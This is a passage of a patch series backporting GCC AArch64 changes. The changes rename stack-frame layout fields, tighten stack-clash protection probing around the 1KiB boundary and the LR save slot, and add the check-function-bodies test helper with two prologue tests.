+ stp reg1, reg2, [sp, -hard_fp_offset]!
+ stp reg3, reg4, [sp, 16]
+- sub sp, sp, outgoing_args_size */
++ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.callee_adjust = const_fp_offset;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.callee_adjust;
+ }
+ else
+ {
+- /* Frame with large local area and outgoing arguments using frame pointer:
++ /* General case:
+ sub sp, sp, hard_fp_offset
+ stp x29, x30, [sp, 0]
+ add x29, sp, 0
+ stp reg3, reg4, [sp, 16]
+- sub sp, sp, outgoing_args_size */
++ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+@@ -5243,9 +5246,11 @@ aarch64_get_separate_components (void)
+ if (aarch64_register_saved_on_entry (regno))
+ {
+ poly_int64 offset = cfun->machine->frame.reg_offset[regno];
++
++ /* Get the offset relative to the register we'll use. */
+ if (!frame_pointer_needed)
+- offset += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset += cfun->machine->frame.bytes_below_hard_fp;
++
+ /* Check that we can access the stack slot of the register with one
+ direct load with no adjustments needed. */
+ if (offset_12bit_unsigned_scaled_p (DImode, offset))
+@@ -5367,8 +5372,8 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+ rtx reg = gen_rtx_REG (mode, regno);
+ poly_int64 offset = cfun->machine->frame.reg_offset[regno];
+ if (!frame_pointer_needed)
+- offset += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset += cfun->machine->frame.bytes_below_hard_fp;
++
+ rtx addr = plus_constant (Pmode, ptr_reg, offset);
+ rtx mem = gen_frame_mem (mode, addr);
+
+@@ -5410,8 +5415,7 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+ /* REGNO2 can be saved/restored in a pair with REGNO. */
+ rtx reg2 = gen_rtx_REG (mode, regno2);
+ if (!frame_pointer_needed)
+- offset2 += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset2 += cfun->machine->frame.bytes_below_hard_fp;
+ rtx addr2 = plus_constant (Pmode, ptr_reg, offset2);
+ rtx mem2 = gen_frame_mem (mode, addr2);
+ rtx set2 = prologue_p ? gen_rtx_SET (mem2, reg2)
+@@ -5478,10 +5482,10 @@ aarch64_stack_clash_protection_alloca_probe_range (void)
+ registers. If POLY_SIZE is not large enough to require a probe this function
+ will only adjust the stack. When allocating the stack space
+ FRAME_RELATED_P is then used to indicate if the allocation is frame related.
+- FINAL_ADJUSTMENT_P indicates whether we are allocating the outgoing
+- arguments. If we are then we ensure that any allocation larger than the ABI
+- defined buffer needs a probe so that the invariant of having a 1KB buffer is
+- maintained.
++ FINAL_ADJUSTMENT_P indicates whether we are allocating the area below
++ the saved registers. If we are then we ensure that any allocation
++ larger than the ABI defined buffer needs a probe so that the
++ invariant of having a 1KB buffer is maintained.
+
+ We emit barriers after each stack adjustment to prevent optimizations from
+ breaking the invariant that we never drop the stack more than a page. This
+@@ -5671,7 +5675,7 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ /* Handle any residuals. Residuals of at least MIN_PROBE_THRESHOLD have to
+ be probed. This maintains the requirement that each page is probed at
+ least once. For initial probing we probe only if the allocation is
+- more than GUARD_SIZE - buffer, and for the outgoing arguments we probe
++ more than GUARD_SIZE - buffer, and below the saved registers we probe
+ if the amount is larger than buffer. GUARD_SIZE - buffer + buffer ==
+ GUARD_SIZE. This works that for any allocation that is large enough to
+ trigger a probe here, we'll have at least one, and if they're not large
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index af0bc3f1881..95831637ba7 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -712,9 +712,13 @@ struct GTY (()) aarch64_frame
+ HOST_WIDE_INT saved_varargs_size;
+
+ /* The size of the saved callee-save int/FP registers. */
+-
+ HOST_WIDE_INT saved_regs_size;
+
++ /* The number of bytes between the bottom of the static frame (the bottom
++ of the outgoing arguments) and the hard frame pointer. This value is
++ always a multiple of STACK_BOUNDARY. */
++ poly_int64 bytes_below_hard_fp;
++
+ /* Offset from the base of the frame (incomming SP) to the
+ top of the locals area. This value is always a multiple of
+ STACK_BOUNDARY. */
+--
+2.34.1
+
+
+From 4604c4cd0a6c4c26d6594ec9a0383b4d9197d9df Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:25:40 +0100
+Subject: [PATCH 03/10] aarch64: Rename locals_offset to bytes_above_locals
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+locals_offset was described as:
+
+ /* Offset from the base of the frame (incomming SP) to the
+ top of the locals area. This value is always a multiple of
+ STACK_BOUNDARY. */
+
+This is implicitly an “upside down†view of the frame: the incoming
+SP is at offset 0, and anything N bytes below the incoming SP is at
+offset N (rather than -N).
+
+However, reg_offset instead uses a “right way up†view; that is,
+it views offsets in address terms. Something above X is at a
+positive offset from X and something below X is at a negative
+offset from X.
+
+Also, even on FRAME_GROWS_DOWNWARD targets like AArch64,
+target-independent code views offsets in address terms too:
+locals are allocated at negative offsets to virtual_stack_vars.
+
+It seems confusing to have *_offset fields of the same structure
+using different polarities like this. This patch tries to avoid
+that by renaming locals_offset to bytes_above_locals.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::locals_offset): Rename to...
+ (aarch64_frame::bytes_above_locals): ...this.
+ * config/aarch64/aarch64.c (aarch64_layout_frame)
+ (aarch64_initial_elimination_offset): Update accordingly.
+---
+ gcc/config/aarch64/aarch64.c | 9 +++++----
+ gcc/config/aarch64/aarch64.h | 6 +++---
+ 2 files changed, 8 insertions(+), 7 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 25cf10cc4b9..dcaf491af42 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4759,7 +4759,8 @@ aarch64_layout_frame (void)
+ = (cfun->machine->frame.hard_fp_offset
+ + cfun->machine->frame.bytes_below_hard_fp);
+
+- cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
++ cfun->machine->frame.bytes_above_locals
++ = cfun->machine->frame.saved_varargs_size;
+
+ cfun->machine->frame.initial_adjust = 0;
+ cfun->machine->frame.final_adjust = 0;
+@@ -8566,14 +8567,14 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+
+ if (from == FRAME_POINTER_REGNUM)
+ return cfun->machine->frame.hard_fp_offset
+- - cfun->machine->frame.locals_offset;
++ - cfun->machine->frame.bytes_above_locals;
+ }
+
+ if (to == STACK_POINTER_REGNUM)
+ {
+ if (from == FRAME_POINTER_REGNUM)
+- return cfun->machine->frame.frame_size
+- - cfun->machine->frame.locals_offset;
++ return cfun->machine->frame.frame_size
++ - cfun->machine->frame.bytes_above_locals;
+ }
+
+ return cfun->machine->frame.frame_size;
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index 95831637ba7..a079a88b4f4 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -719,10 +719,10 @@ struct GTY (()) aarch64_frame
+ always a multiple of STACK_BOUNDARY. */
+ poly_int64 bytes_below_hard_fp;
+
+- /* Offset from the base of the frame (incomming SP) to the
+- top of the locals area. This value is always a multiple of
++ /* The number of bytes between the top of the locals area and the top
++ of the frame (the incomming SP). This value is always a multiple of
+ STACK_BOUNDARY. */
+- poly_int64 locals_offset;
++ poly_int64 bytes_above_locals;
+
+ /* Offset from the base of the frame (incomming SP) to the
+ hard_frame_pointer. This value is always a multiple of
+--
+2.34.1
+
+
+From 16016465ff28a75f5e0540cbaeb4eb102fdc3230 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:28:11 +0100
+Subject: [PATCH 04/10] aarch64: Rename hard_fp_offset to bytes_above_hard_fp
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Similarly to the previous locals_offset patch, hard_fp_offset
+was described as:
+
+ /* Offset from the base of the frame (incomming SP) to the
+ hard_frame_pointer. This value is always a multiple of
+ STACK_BOUNDARY. */
+ poly_int64 hard_fp_offset;
+
+which again took an “upside-down†view: higher offsets meant lower
+addresses. This patch renames the field to bytes_above_hard_fp instead.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::hard_fp_offset): Rename
+ to...
+ (aarch64_frame::bytes_above_hard_fp): ...this.
+ * config/aarch64/aarch64.c (aarch64_layout_frame)
+ (aarch64_expand_prologue): Update accordingly.
+ (aarch64_initial_elimination_offset): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 21 +++++++++++----------
+ gcc/config/aarch64/aarch64.h | 6 +++---
+ 2 files changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index dcaf491af42..2681e0c2bb9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4747,7 +4747,7 @@ aarch64_layout_frame (void)
+ HOST_WIDE_INT varargs_and_saved_regs_size
+ = offset + cfun->machine->frame.saved_varargs_size;
+
+- cfun->machine->frame.hard_fp_offset
++ cfun->machine->frame.bytes_above_hard_fp
+ = aligned_upper_bound (varargs_and_saved_regs_size
+ + get_frame_size (),
+ STACK_BOUNDARY / BITS_PER_UNIT);
+@@ -4756,7 +4756,7 @@ aarch64_layout_frame (void)
+ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT));
+ cfun->machine->frame.frame_size
+- = (cfun->machine->frame.hard_fp_offset
++ = (cfun->machine->frame.bytes_above_hard_fp
+ + cfun->machine->frame.bytes_below_hard_fp);
+
+ cfun->machine->frame.bytes_above_locals
+@@ -4788,7 +4788,7 @@ aarch64_layout_frame (void)
+ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
+ + cfun->machine->frame.saved_regs_size, 512)
+ && !(cfun->calls_alloca
+- && known_lt (cfun->machine->frame.hard_fp_offset,
++ && known_lt (cfun->machine->frame.bytes_above_hard_fp,
+ max_push_offset)))
+ {
+ /* Frame with small area below the saved registers:
+@@ -4797,14 +4797,14 @@ aarch64_layout_frame (void)
+ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ cfun->machine->frame.callee_offset
+- = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
++ = cfun->machine->frame.frame_size - cfun->machine->frame.bytes_above_hard_fp;
+ }
+- else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
++ else if (cfun->machine->frame.bytes_above_hard_fp.is_constant (&const_fp_offset)
+ && const_fp_offset < max_push_offset)
+ {
+ /* Frame with large area below the saved registers, but with a
+ small area above:
+- stp reg1, reg2, [sp, -hard_fp_offset]!
++ stp reg1, reg2, [sp, -bytes_above_hard_fp]!
+ stp reg3, reg4, [sp, 16]
+ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.callee_adjust = const_fp_offset;
+@@ -4814,12 +4814,13 @@ aarch64_layout_frame (void)
+ else
+ {
+ /* General case:
+- sub sp, sp, hard_fp_offset
++ sub sp, sp, bytes_above_hard_fp
+ stp x29, x30, [sp, 0]
+ add x29, sp, 0
+ stp reg3, reg4, [sp, 16]
+ sub sp, sp, bytes_below_hard_fp */
+- cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
++ cfun->machine->frame.initial_adjust
++ = cfun->machine->frame.bytes_above_hard_fp;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+ }
+@@ -8563,10 +8564,10 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+ if (to == HARD_FRAME_POINTER_REGNUM)
+ {
+ if (from == ARG_POINTER_REGNUM)
+- return cfun->machine->frame.hard_fp_offset;
++ return cfun->machine->frame.bytes_above_hard_fp;
+
+ if (from == FRAME_POINTER_REGNUM)
+- return cfun->machine->frame.hard_fp_offset
++ return cfun->machine->frame.bytes_above_hard_fp
+ - cfun->machine->frame.bytes_above_locals;
+ }
+
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index a079a88b4f4..eab6da84a02 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -724,10 +724,10 @@ struct GTY (()) aarch64_frame
+ STACK_BOUNDARY. */
+ poly_int64 bytes_above_locals;
+
+- /* Offset from the base of the frame (incomming SP) to the
+- hard_frame_pointer. This value is always a multiple of
++ /* The number of bytes between the hard_frame_pointer and the top of
++ the frame (the incomming SP). This value is always a multiple of
+ STACK_BOUNDARY. */
+- poly_int64 hard_fp_offset;
++ poly_int64 bytes_above_hard_fp;
+
+ /* The size of the frame. This value is the offset from base of the
+ frame (incomming SP) to the stack_pointer. This value is always
+--
+2.34.1
+
+
+From eb2271eb6bb68ec3c9aa9ae4746ea1ee5f18874a Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 22 Jun 2023 22:26:30 +0100
+Subject: [PATCH 05/10] aarch64: Tweak frame_size comment
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch fixes another case in which a value was described with
+an “upside-down†view.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::frame_size): Tweak comment.
+---
+ gcc/config/aarch64/aarch64.h | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index eab6da84a02..7c4b65ec55b 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -729,8 +729,8 @@ struct GTY (()) aarch64_frame
+ STACK_BOUNDARY. */
+ poly_int64 bytes_above_hard_fp;
+
+- /* The size of the frame. This value is the offset from base of the
+- frame (incomming SP) to the stack_pointer. This value is always
++ /* The size of the frame, i.e. the number of bytes between the bottom
++ of the outgoing arguments and the incoming SP. This value is always
+ a multiple of STACK_BOUNDARY. */
+ poly_int64 frame_size;
+
+--
+2.34.1
+
+
+From cfed3b87e9351edff1568ade4ef666edc9887639 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 15 Aug 2023 19:05:30 +0100
+Subject: [PATCH 06/10] Backport check-function-bodies support
+
+---
+ gcc/testsuite/lib/scanasm.exp | 191 ++++++++++++++++++++++++++++++++++
+ 1 file changed, 191 insertions(+)
+
+diff --git a/gcc/testsuite/lib/scanasm.exp b/gcc/testsuite/lib/scanasm.exp
+index 35ccbc86fc0..c9af27bf47a 100644
+--- a/gcc/testsuite/lib/scanasm.exp
++++ b/gcc/testsuite/lib/scanasm.exp
+@@ -546,3 +546,194 @@ proc scan-lto-assembler { args } {
+ verbose "output_file: $output_file"
+ dg-scan "scan-lto-assembler" 1 $testcase $output_file $args
+ }
++
++# Read assembly file FILENAME and store a mapping from function names
++# to function bodies in array RESULT. FILENAME has already been uploaded
++# locally where necessary and is known to exist.
++
++proc parse_function_bodies { filename result } {
++ upvar $result up_result
++
++ # Regexp for the start of a function definition (name in \1).
++ set label {^([a-zA-Z_]\S+):$}
++
++ # Regexp for the end of a function definition.
++ set terminator {^\s*\.size}
++
++ # Regexp for lines that aren't interesting.
++ set fluff {^\s*(?:\.|//|@|$)}
++
++ set fd [open $filename r]
++ set in_function 0
++ while { [gets $fd line] >= 0 } {
++ if { [regexp $label $line dummy function_name] } {
++ set in_function 1
++ set function_body ""
++ } elseif { $in_function } {
++ if { [regexp $terminator $line] } {
++ set up_result($function_name) $function_body
++ set in_function 0
++ } elseif { ![regexp $fluff $line] } {
++ append function_body $line "\n"
++ }
++ }
++ }
++ close $fd
++}
++
++# FUNCTIONS is an array that maps function names to function bodies.
++# Return true if it contains a definition of function NAME and if
++# that definition matches BODY_REGEXP.
++
++proc check_function_body { functions name body_regexp } {
++ upvar $functions up_functions
++
++ if { ![info exists up_functions($name)] } {
++ return 0
++ }
++ set fn_res [regexp "^$body_regexp\$" $up_functions($name)]
++ if { !$fn_res } {
++ verbose -log "body: $body_regexp"
++ verbose -log "against: $up_functions($name)"
++ }
++ return $fn_res
++}
++
++# Check the implementations of functions against expected output. Used as:
++#
++# { dg-do { check-function-bodies PREFIX TERMINATOR[ OPTION[ SELECTOR]] } }
++#
++# See sourcebuild.texi for details.
++
++proc check-function-bodies { args } {
++ if { [llength $args] < 2 } {
++ error "too few arguments to check-function-bodies"
++ }
++ if { [llength $args] > 4 } {
++ error "too many arguments to check-function-bodies"
++ }
++
++ if { [llength $args] >= 3 } {
++ set required_flags [lindex $args 2]
++
++ upvar 2 dg-extra-tool-flags extra_tool_flags
++ set flags $extra_tool_flags
++
++ global torture_current_flags
++ if { [info exists torture_current_flags] } {
++ append flags " " $torture_current_flags
++ }
++ foreach required_flag $required_flags {
++ switch -- $required_flag {
++ target -
++ xfail {
++ error "misplaced $required_flag in check-function-bodies"
++ }
++ }
++ }
++ foreach required_flag $required_flags {
++ if { ![regexp " $required_flag " $flags] } {
++ return
++ }
++ }
++ }
++
++ set xfail_all 0
++ if { [llength $args] >= 4 } {
++ switch [dg-process-target [lindex $args 3]] {
++ "S" { }
++ "N" { return }
++ "F" { set xfail_all 1 }
++ "P" { }
++ }
++ }
++
++ set testcase [testname-for-summary]
++ # The name might include a list of options; extract the file name.
++ set filename [lindex $testcase 0]
++
++ global srcdir
++ set input_filename "$srcdir/$filename"
++ set output_filename "[file rootname [file tail $filename]].s"
++
++ set prefix [lindex $args 0]
++ set prefix_len [string length $prefix]
++ set terminator [lindex $args 1]
++ if { [string equal $terminator ""] } {
++ set terminator "*/"
++ }
++ set terminator_len [string length $terminator]
++
++ set have_bodies 0
++ if { [is_remote host] } {
++ remote_upload host "$filename"
++ }
++ if { [file exists $output_filename] } {
++ parse_function_bodies $output_filename functions
++ set have_bodies 1
++ } else {
++ verbose -log "$testcase: output file does not exist"
++ }
++
++ set count 0
++ set function_regexp ""
++ set label {^(\S+):$}
++
++ set lineno 1
++ set fd [open $input_filename r]
++ set in_function 0
++ while { [gets $fd line] >= 0 } {
++ if { [string equal -length $prefix_len $line $prefix] } {
++ set line [string trim [string range $line $prefix_len end]]
++ if { !$in_function } {
++ if { [regexp "^(.*?\\S)\\s+{(.*)}\$" $line dummy \
++ line selector] } {
++ set selector [dg-process-target $selector]
++ } else {
++ set selector "P"
++ }
++ if { ![regexp $label $line dummy function_name] } {
++ close $fd
++ error "check-function-bodies: line $lineno does not have a function label"
++ }
++ set in_function 1
++ set function_regexp ""
++ } elseif { [string equal $line "("] } {
++ append function_regexp "(?:"
++ } elseif { [string equal $line "|"] } {
++ append function_regexp "|"
++ } elseif { [string equal $line ")"] } {
++ append function_regexp ")"
++ } elseif { [string equal $line "..."] } {
++ append function_regexp ".*"
++ } else {
++ append function_regexp "\t" $line "\n"
++ }
++ } elseif { [string equal -length $terminator_len $line $terminator] } {
++ if { ![string equal $selector "N"] } {
++ if { $xfail_all || [string equal $selector "F"] } {
++ setup_xfail "*-*-*"
++ }
++ set testname "$testcase check-function-bodies $function_name"
++ if { !$have_bodies } {
++ unresolved $testname
++ } elseif { [check_function_body functions $function_name \
++ $function_regexp] } {
++ pass $testname
++ } else {
++ fail $testname
++ }
++ }
++ set in_function 0
++ incr count
++ }
++ incr lineno
++ }
++ close $fd
++ if { $in_function } {
++ error "check-function-bodies: missing \"$terminator\""
++ }
++ if { $count == 0 } {
++ error "check-function-bodies: no matches found"
++ }
++}
+--
+2.34.1
+
+
+From 4dd8925d95d3d6d89779b494b5f4cfadcf9fa96e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:11:44 +0100
+Subject: [PATCH 07/10] aarch64: Tweak stack clash boundary condition
+
+The AArch64 ABI says that, when stack clash protection is used,
+there can be a maximum of 1KiB of unprobed space at sp on entry
+to a function. Therefore, we need to probe when allocating
+>= guard_size - 1KiB of data (>= rather than >). This is what
+GCC does.
+
+If an allocation is exactly guard_size bytes, it is enough to allocate
+those bytes and probe once at offset 1024. It isn't possible to use a
+single probe at any other offset: higher would conmplicate later code,
+by leaving more unprobed space than usual, while lower would risk
+leaving an entire page unprobed. For simplicity, the code probes all
+allocations at offset 1024.
+
+Some register saves also act as probes. If we need to allocate
+more space below the last such register save probe, we need to
+probe the allocation if it is > 1KiB. Again, this allocation is
+then sometimes (but not always) probed at offset 1024. This sort of
+allocation is currently only used for outgoing arguments, which are
+rarely this big.
+
+However, the code also probed if this final outgoing-arguments
+allocation was == 1KiB, rather than just > 1KiB. This isn't
+necessary, since the register save then probes at offset 1024
+as required. Continuing to probe allocations of exactly 1KiB
+would complicate later patches.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+ Don't probe final allocations that are exactly 1KiB in size (after
+ unprobed space above the final allocation has been deducted).
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-17.c: New test.
+---
+ gcc/config/aarch64/aarch64.c | 6 +-
+ .../aarch64/stack-check-prologue-17.c | 55 +++++++++++++++++++
+ 2 files changed, 60 insertions(+), 1 deletion(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 2681e0c2bb9..4c9e11cd7cf 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5506,6 +5506,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT guard_size
+ = 1 << PARAM_VALUE (PARAM_STACK_CLASH_PROTECTION_GUARD_SIZE);
+ HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
++ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
++ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+ /* When doing the final adjustment for the outgoing argument size we can't
+ assume that LR was saved at position 0. So subtract it's offset from the
+ ABI safe buffer so that we don't accidentally allow an adjustment that
+@@ -5513,7 +5515,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ probing. */
+ HOST_WIDE_INT min_probe_threshold
+ = final_adjustment_p
+- ? guard_used_by_caller - cfun->machine->frame.reg_offset[LR_REGNUM]
++ ? (guard_used_by_caller
++ + byte_sp_alignment
++ - cfun->machine->frame.reg_offset[LR_REGNUM])
+ : guard_size - guard_used_by_caller;
+
+ poly_int64 frame_size = cfun->machine->frame.frame_size;
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+new file mode 100644
+index 00000000000..0d8a25d73a2
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -0,0 +1,55 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1024
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test1(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test2:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1040
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test2(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x);
++ }
++ g();
++ return 1;
++}
+--
+2.34.1
+
+
+From 12517baf6c88447e3bda3a459ac4c29d61f84e6c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:12:55 +0100
+Subject: [PATCH 08/10] aarch64: Put LR save probe in first 16 bytes
+
+-fstack-clash-protection uses the save of LR as a probe for the next
+allocation. The next allocation could be:
+
+* another part of the static frame, e.g. when allocating SVE save slots
+ or outgoing arguments
+
+* an alloca in the same function
+
+* an allocation made by a callee function
+
+However, when -fomit-frame-pointer is used, the LR save slot is placed
+above the other GPR save slots. It could therefore be up to 80 bytes
+above the base of the GPR save area (which is also the hard fp address).
+
+aarch64_allocate_and_probe_stack_space took this into account when
+deciding how much subsequent space could be allocated without needing
+a probe. However, it interacted badly with:
+
+ /* If doing a small final adjustment, we always probe at offset 0.
+ This is done to avoid issues when LR is not at position 0 or when
+ the final adjustment is smaller than the probing offset. */
+ else if (final_adjustment_p && rounded_size == 0)
+ residual_probe_offset = 0;
+
+which forces any allocation that is smaller than the guard page size
+to be probed at offset 0 rather than the usual offset 1024. It was
+therefore possible to construct cases in which we had:
+
+* a probe using LR at SP + 80 bytes (or some other value >= 16)
+* an allocation of the guard page size - 16 bytes
+* a probe at SP + 0
+
+which allocates guard page size + 64 consecutive unprobed bytes.
+
+This patch requires the LR probe to be in the first 16 bytes of the
+save area when stack clash protection is active. Doing it
+unconditionally would cause code-quality regressions.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Ensure that
+ the LR save slot is in the first 16 bytes of the register save area.
+ (aarch64_allocate_and_probe_stack_space): Remove workaround for
+ when LR was not in the first 16 bytes.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-18.c: New test.
+---
+ gcc/config/aarch64/aarch64.c | 50 +++++----
+ .../aarch64/stack-check-prologue-18.c | 100 ++++++++++++++++++
+ 2 files changed, 127 insertions(+), 23 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 4c9e11cd7cf..1e8467fdd03 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4686,15 +4686,31 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+
++#define ALLOCATE_GPR_SLOT(REGNO) \
++ do \
++ { \
++ cfun->machine->frame.reg_offset[REGNO] = offset; \
++ if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM) \
++ cfun->machine->frame.wb_candidate1 = (REGNO); \
++ else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM) \
++ cfun->machine->frame.wb_candidate2 = (REGNO); \
++ offset += UNITS_PER_WORD; \
++ } \
++ while (0)
++
+ if (cfun->machine->frame.emit_frame_chain)
+ {
+ /* FP and LR are placed in the linkage record. */
+- cfun->machine->frame.reg_offset[R29_REGNUM] = 0;
+- cfun->machine->frame.wb_candidate1 = R29_REGNUM;
+- cfun->machine->frame.reg_offset[R30_REGNUM] = UNITS_PER_WORD;
+- cfun->machine->frame.wb_candidate2 = R30_REGNUM;
+- offset = 2 * UNITS_PER_WORD;
++ ALLOCATE_GPR_SLOT (R29_REGNUM);
++ ALLOCATE_GPR_SLOT (R30_REGNUM);
+ }
++ else if (flag_stack_clash_protection
++ && cfun->machine->frame.reg_offset[R30_REGNUM] == SLOT_REQUIRED)
++ /* Put the LR save slot first, since it makes a good choice of probe
++ for stack clash purposes. The idea is that the link register usually
++ has to be saved before a call anyway, and so we lose little by
++ stopping it from being individually shrink-wrapped. */
++ ALLOCATE_GPR_SLOT (R30_REGNUM);
+
+ /* With stack-clash, LR must be saved in non-leaf functions. */
+ gcc_assert (crtl->is_leaf
+@@ -4704,14 +4720,9 @@ aarch64_layout_frame (void)
+ /* Now assign stack slots for them. */
+ for (regno = R0_REGNUM; regno <= R30_REGNUM; regno++)
+ if (cfun->machine->frame.reg_offset[regno] == SLOT_REQUIRED)
+- {
+- cfun->machine->frame.reg_offset[regno] = offset;
+- if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM)
+- cfun->machine->frame.wb_candidate1 = regno;
+- else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM)
+- cfun->machine->frame.wb_candidate2 = regno;
+- offset += UNITS_PER_WORD;
+- }
++ ALLOCATE_GPR_SLOT (regno);
++
++#undef ALLOCATE_GPR_SLOT
+
+ HOST_WIDE_INT max_int_offset = offset;
+ offset = ROUND_UP (offset, STACK_BOUNDARY / BITS_PER_UNIT);
